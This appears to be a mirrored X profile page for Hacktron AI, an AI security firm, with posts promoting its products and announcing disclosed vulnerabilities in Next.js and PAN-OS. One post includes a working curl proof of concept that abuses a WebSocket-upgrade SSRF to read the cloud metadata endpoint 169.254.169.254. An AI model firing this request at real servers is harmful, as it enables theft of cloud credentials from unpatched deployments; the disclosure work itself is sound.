Olivia
Online
Hacktron AI
@HacktronAI
Hacktron is an autonomous vulnerability hunter for ambitious engineering teams. Built by world-class security researchers. Powered by one principle: PoC || GTFO
Latent Space
Joined April 2025
10 Following
3.8K Followers
129 Posts
Pinned Tweet
Introducing Hacktron Review: an AI security reviewer for your pull requests.
It understands your whole codebase, builds a threat model, takes your feedback, and catches exploitable vulnerabilities before they reach production.
Try for free: https://t.co/ZHfG7cvXRe
Find out more: https://t.co/A31E7UyE5s
Introducing Hacktron Whitebox: get white-box security assessments with audit-ready reports without waiting on a traditional pentest cycle.
AI has roughly tripled the rate of code shipped in the past year. But penetration testing has not kept pace, often taking weeks to months.
The outcome: a faster, more cost-effective security assessment that does not compromise on quality. This is not just checkbox compliance. Hacktron Whitebox helps teams generate evidence for SOC 2 and ISO 27001, while giving engineers valuable, actionable findings they can fix.
Nice overview of the vulnerability discovery landscape! Very proud of the work we've done at @HacktronAI, as well as that of our peers at Anthropic and AISLE.
AI has sped up vulnerability discovery, but coverage and signal remain to be important metrics we optimize for.
Who's finding what? @AnthropicAI owns critical count. @HacktronAI leads on severity + exploitability. AISLE covers the most CWE types. There’s no clear overall winner.
Hacktron Review plugs into your pull requests and catches exploitable vulnerabilities other scanners walk straight past.
Find real security issues within 24 hours of onboarding.
Try it free → https://t.co/hkx1I3nkgE
When Your VPN Opens Your Private Network to the Public!
An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN.
Blog - https://t.co/xMBbKC60NZ
what can go wrong?
This is a critical auth bypass (affecting GlobalProtect VPN), not sure why this was marked as high. I have already managed to get VPN access to major corps!
Unlike the buffer overflow this isn't limited to PAN OS.
Will be disclosing full details later next week on @HacktronAI blog.
https://t.co/iby50nmGdF
Check out our security work on Next.js.
We’re also offering free security scans for open source projects. Apply here:
https://t.co/fBHnQwhU8S
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI
CVE-2026-44578: SSRF via WebSocket upgrade.
It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications.
curl -H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
"http://target:3000" \
--request-target "http://169.254.169.254/latest/meta-data/"
I've seen enough fundraising announcement videos. This isn’t one of them.
At @HacktronAI, we do security, and we do it well. That’s what matters to us. We solve real problems for our customers. On average, they uncover real vulnerabilities missed by other tools within 24 hours of onboarding.
Just this year, we've already responsibly disclosed vulnerabilities in Vercel's Next.js, Grafana, Jetbrain's YouTrack, OpenAM, Metabase, and BeyondTrust's Remote Support Software.
No unearned, bullshit hype. Just security that works.
RCE in Github VSCode Copilot Chat
https://t.co/wbXHF0OkFU
Hacktron ❤️ Open Source
TL;DR: If you maintain an open source project, we want to give you Hacktron Review for free.
Because giving maintainers the same capabilities as attackers would otherwise use against them felt like the right thing to do.
https://t.co/fBHnQwhU8S
Next.js v16.2.5 fixes a bunch of vulnerabilities reported by @HacktronAI.
Patch ASAP, especially if you’re running self-hosted Next.js that SSRF might affect you
CVE-2026-44574: Middleware / Proxy bypass via dynamic route parameter injection
CVE-2026-44578: SSRF in applications using WebSocket upgrades
CVE-2026-44581: XSS in App Router applications using CSP nonces
when react2shell hit last year, i think vercel handled it brilliantly.
to protect their users, they paid $50,000 for every bypass researchers could find. we decided to participate, and ended up earning $170,000.
read how we did it here: https://t.co/2dM6Mf9PHU
https://t.co/8vyWt5DmN6
TL;DR: If a large model finds a 0day with 90% probability, and a small model with 50% probability, but the small model costs 10x less, it is better to use the small model.
Mythos showed that frontier models can find complex vulnerabilities with a skilled operator in the loop.
But for applications that don't have the complexity of a JIT compiler, we found that smaller models run repeatedly can outperform larger frontier models on cost-to-recall.
https://t.co/mr6ROAaXdg
I am a bit late to the "Mythos" clickbait. But here we go:
Why Mythos doesn't matter (for us)
https://t.co/2ATIC7Etal
Last Seen Users on Sotwe
Elijah J. Magnier 🇪🇺
Seen from United States
Ensest CD Pasif
Seen from Turkey
marceline
Seen from United States
รักคนอ้วนอ้วน
Seen from Thailand
ijal
Seen from Indonesia
NVmind
Seen from United States
Sargodha Bull
Seen from Saudi Arabia
Arul
Seen from Austria
Liseli Porno - Bedava Porno
Seen from Germany
dos
Seen from United States
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.3M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
60.9M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers